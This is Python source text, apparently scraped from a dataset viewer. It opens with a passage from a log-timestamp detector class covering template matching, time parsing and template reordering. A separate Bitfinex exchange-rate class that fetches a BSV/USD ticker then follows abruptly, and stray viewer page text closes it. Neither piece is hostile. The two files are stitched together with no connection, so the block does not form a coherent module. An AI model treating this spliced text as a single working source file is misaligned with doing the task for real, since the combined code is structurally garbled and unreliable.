                match = template.matchDate(line)
                if match:
                    distance = match.start()
                    endpos = match.end()
                    log(logLevel, '  matched time template #%02i (at %r <= %r, %r) %s', i, distance, ddtempl.distance, self.__lastPos[0], template.name)
                    # last template or anchored: accept immediately
                    if (i + 1) >= len(self.__templates):
                        break
                    if template.flags & (DateTemplate.LINE_BEGIN | DateTemplate.LINE_END):
                        break
                    # line-begin match of an already-hit template while the
                    # next template was never used: accept
                    if ((distance == 0) and ddtempl.hits) and (not self.__templates[(i + 1)].template.hits):
                        break
                    # match moved right relative to history: possible false
                    # positive - reserve the closest one and continue
                    if (distance > ddtempl.distance) or (distance > self.__lastPos[0]):
                        log(logLevel, '  ** distance collision - pattern change, reserve')
                        if distance < found[1]:
                            found = (match, distance, endpos, i)
                        match = None
                        i += 1
                        continue
                    break
                i += 1
            # nothing direct - fall back to the best reserved candidate
            if (not match) and found[0]:
                (match, distance, endpos, i) = found
                log(logLevel, '  use best time template #%02i', i)
                ddtempl = self.__templates[i]
                template = ddtempl.template
        if match:
            # bookkeeping for the fast path of the next call
            ddtempl.hits += 1
            ddtempl.lastUsed = time.time()
            ddtempl.distance = distance
            if self.__firstUnused == i:
                self.__firstUnused += 1
            self.__lastPos = (distance, line[(distance - 1):distance], line[distance])
            self.__lastEndPos = (endpos, line[(endpos - 1)], line[endpos:(endpos + 1)])
            # promote the template towards the front when it changed
            if i and (i != self.__lastTemplIdx):
                i = self._reorderTemplate(i)
            self.__lastTemplIdx = i
            return (match, template)
        log(logLevel, ' no template.')
        return (None, None)

    @property
    def default_tz(self):
        """Default time zone applied to timestamps without explicit zone."""
        return self.__default_tz

    @default_tz.setter
    def default_tz(self, value):
        self.__default_tz = validateTimeZone(value)

    def getTime(self, line, timeMatch=None):
        """Parse *line* into (epoch, match) using a matched template.

        Uses *timeMatch* (a previous ``matchTime`` result) when given;
        returns None when no template matches or parsing fails.
        """
        if timeMatch is None:
            timeMatch = self.matchTime(line)
        template = timeMatch[1]
        if template is not None:
            try:
                date = template.getDate(line, timeMatch[0], default_tz=self.__default_tz)
                if date is not None:
                    if logSys.getEffectiveLevel() <= logLevel:
                        logSys.log(logLevel, '  got time %f for %r using template %s', date[0], date[1].group(1), template.name)
                    return date
            except ValueError:
                # template matched but could not be converted to a date
                pass
        return None

    def _reorderTemplate(self, num):
        """Move template *num* towards the front when its usage weight beats
        the template at the candidate position; returns the new index."""
        if num:
            templates = self.__templates
            ddtempl = templates[num]
            if logSys.getEffectiveLevel() <= logLevel:
                logSys.log(logLevel, '  -> reorder template #%02i, hits: %r', num, ddtempl.hits)
            # templates last used before `untime` are considered stale
            untime = (ddtempl.lastUsed - self.__unusedTime)
            weight = ddtempl.weight
            # candidate slot: first never-used slot, else halfway to front
            pos = (self.__firstUnused if (self.__firstUnused < num) else (num // 2))

            def _moveable():
                pweight = templates[pos].weight
                if logSys.getEffectiveLevel() <= logLevel:
                    logSys.log(logLevel, '  -> compare template #%02i & #%02i, weight %.3f > %.3f, hits %r > %r', num, pos, weight, pweight, ddtempl.hits, templates[pos].hits)
                return ((weight > pweight) or (untime > templates[pos].lastUsed))

            if not _moveable():
                if pos == (num - 1):
                    return num
                # try the adjacent slot instead
                pos = (num - 1)
                if not _moveable():
                    return num
            # move it
            del templates[num]
            templates[pos:0] = [ddtempl]
            # advance the never-used boundary past all used templates
            while (self.__firstUnused < len(templates)) and templates[self.__firstUnused].hits:
                self.__firstUnused += 1
            if logSys.getEffectiveLevel() <= logLevel:
                logSys.log(logLevel, '  -> moved template #%02i -> #%02i', num, pos)
            return pos
        return num
class Bitfinex(ExchangeBase):
    """Exchange-rate source backed by the Bitfinex v2 public tickers API."""

    # Field offsets inside one v2 ticker array entry.
    INDEX_SYMBOL = 0
    INDEX_BID = 1
    INDEX_BID_SIZE = 2
    INDEX_ASK = 3
    INDEX_ASK_SIZE = 4
    INDEX_DAILY_CHANGE = 5
    INDEX_DAILY_CHANGE_PERC = 6
    INDEX_LAST_PRICE = 7
    INDEX_VOLUME = 8
    INDEX_HIGH = 9
    INDEX_LOW = 10

    def get_rates(self, ccy):
        """Return {'USD': Decimal(last price)} from the tBSVUSD ticker.

        Raises RuntimeError when the API payload is not a non-empty list.
        """
        json_value = self.get_json('api.bitfinex.com', '/v2/tickers?symbols=tBSVUSD')
        if not (isinstance(json_value, list) and json_value):
            raise RuntimeError(f'bad Bitfinex rates: {json_value}')
        last_price = json_value[0][Bitfinex.INDEX_LAST_PRICE]
        return {'USD': Decimal(last_price)}
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.